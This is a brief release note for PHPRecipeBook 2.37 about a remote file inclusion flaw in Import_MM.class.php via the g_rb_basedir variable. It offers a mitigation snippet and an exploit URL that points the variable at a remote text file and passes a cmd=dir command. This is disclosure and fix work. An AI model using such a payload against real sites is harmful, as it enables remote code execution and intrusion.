PHPRecipeBook

File Release Notes and Changelog

Release Name: 2.37

Notes:
fix for this:

To solve problem sanitise g_rb_basedir in Import_MM_class.php, or add the below line of
code to the top of file:

if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
    die();

Exploit:
classes/Import_MM.class.php?g_rb_basedir=http://localhost/s.txt?&cmd=dir


This will only impact people running with REGISTER GLOBALS ON (php setting).  If you are TURN IT OFF!

But I have removed the include that points a var.

Changes: